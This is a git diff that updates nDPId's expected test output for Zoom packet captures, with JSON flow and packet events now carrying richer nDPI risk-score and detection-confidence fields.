+00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470769,"flow_last_seen":1569520471156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7746,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
+00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1569520470776,"flow_last_seen":1569520471159,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6714,"flow_avg_l4_payload_len":239,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569520471915,"flow_last_seen":1569520473157,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Zoom","breed":"Acceptable","category":"Video"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00612{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569520471915,"flow_last_seen":1569520473157,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1569520471189,"flow_last_seen":1569520473190,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":57752,"flow_avg_l4_payload_len":275,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}}
+00816{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1569520471189,"flow_last_seen":1569520473190,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":57752,"flow_avg_l4_payload_len":275,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","total-events-serialized":210}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 700/697
@@ -216,9 +216,9 @@
 ~~ total active/idle flows...: 33/33
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4793218 bytes
-~~ total memory freed........: 4793218 bytes
-~~ total allocations/frees...: 100423/100423
+~~ total memory allocated....: 4867675 bytes
+~~ total memory freed........: 4867675 bytes
+~~ total allocations/frees...: 102013/102013
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
 ~~ json string max len.......: 2321 chars
diff --git a/test/results/zoom2.pcap.out b/test/results/zoom2.pcap.out
index 237544820..1b5d3cec6 100644
--- a/test/results/zoom2.pcap.out
+++ b/test/results/zoom2.pcap.out
@@ -3,15 +3,15 @@
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1642965458402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1642965458402,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGngDAqAGykMNJmsOcAbton\/9jAAAAALAC\/\/+GrAAAAgQFtAEDAwUBAQgKBNjhZQAAAAAEAgAA"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1642965458577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1642965458577,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGrQSQw0mawKgBsgG7w5wp5A9SaJ\/\/ZKASqbBcNQAAAgQFrAQCCApc+vuKBNjhZQEDAww="}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1642965458577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1642965458577,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGngzAqAGykMNJmsOcAbton\/9kKeQPU4AQECwj1wAAAQEICgTY4hFc+vuK"}
-00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642965458402,"flow_last_seen":1642965458578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1642965458578,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00972{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01249{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","server_names":"*.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Zoom Video Communications, Inc., CN=*.sjc.zoom.us","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"43:42:0A:34:FD:F6:7A:FC:E9:C1:95:D8:E0:79:7E:17:B9:65:B0:A7"}}
+01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642965458402,"flow_last_seen":1642965458578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1642965458578,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01078{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01355{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","server_names":"*.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Zoom Video Communications, Inc., CN=*.sjc.zoom.us","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"43:42:0A:34:FD:F6:7A:FC:E9:C1:95:D8:E0:79:7E:17:B9:65:B0:A7"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965459595,"flow_last_seen":1642965459595,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1642965459595,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1642965459595,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"ts_msec":1642965459595,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXeHsAAEARZSPAqAGykMNJmuztImEAgzNnAQADyErEUocYzaK4R3obiZ8zgwAAAAAAAAACAG9hPwBvYT8AAABA5tdm9ZTyTIyTAkYLAufeKJLgneU8bl8DozakMMlr\/JDYAlm5+8RxsTcW0dGDYHnKojsP3MD2C2S9PgF8PPhtdgAAAAAAQABAAAB1MAABAAMAAiAA"}
 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1642965459696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"ts_msec":1642965459696,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXZlQAAEARd0rAqAGykMNJmuztImEAg30SAQADyErEUocYzaK4R3obiZ8zgwAAAAAAAAACAG9hpABvYaQAAABASNx7XNkhaVV2TkWPa7HXWfzTaegL7lyuofS42ADMsef1ZS+nG51oqDil0vt0Fn4zbdXfyiCV8oAbYGEn4LlcKwAAAAAAQABAAAB1MAABAAMAAiAA"}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1642965459762,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1642965459762,"pkt":"KDc3AG3IEBMx8Tl2CABFAABIvJFAADER8FuQw0mawKgBsiJh7O0ANHLoAgADyErEUocYzaK4R3obiZ8zgwBPg3gAb2E\/AAAAAAAAAAAAQABAAAPgAwA="}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":172,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965459595,"flow_last_seen":1642965460094,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1036,"flow_tot_l4_payload_len":21646,"flow_avg_l4_payload_len":676,"midstream":0,"ts_msec":1642965460094,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","ndpi": {"proto":"Zoom","breed":"Acceptable","category":"Video"}}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965459595,"flow_last_seen":1642965460094,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1036,"flow_tot_l4_payload_len":21646,"flow_avg_l4_payload_len":676,"midstream":0,"ts_msec":1642965460094,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated","category":"Video"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":172,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965459595,"flow_last_seen":1642965460094,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1036,"flow_tot_l4_payload_len":21646,"flow_avg_l4_payload_len":676,"midstream":0,"ts_msec":1642965460094,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965459595,"flow_last_seen":1642965460094,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1036,"flow_tot_l4_payload_len":21646,"flow_avg_l4_payload_len":676,"midstream":0,"ts_msec":1642965460094,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965460219,"flow_last_seen":1642965460219,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1642965460219,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":58117,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1642965460219,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"ts_msec":1642965460219,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXHkIAAEARv1zAqAGykMNJmuMFImEAg0sbAQADlUCX4nL8uBw5x1bMJMqfpQAAAAAAAAACAG9jrwBvY68AAABAl22YpdImmjxXhx5z1M7uHC\/xx4xLX\/xo6rKtN3WTuu3glztmqi13Dg3+OBrijJCCvcHGEhZr6j9A\/GzgvpreMAAAAAAAQABAAAB1MAABAAMAAiAA"}
 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1642965460317,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"ts_msec":1642965460317,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXuuwAAEARIrLAqAGykMNJmuMFImEAg\/g7AQADlUCX4nL8uBw5x1bMJMqfpQAAAAAAAAACAG9kEQBvZBEAAABAYCF6J0n\/WNesLuhly3GilJRpD8dJ+KbseJYiXUvXdBy1BvwwVV6C\/wnkDo4q0xg18raEv1VcZUiYfPp+4+eDYQAAAAAAQABAAAB1MAABAAMAAiAA"}
@@ -20,20 +20,20 @@
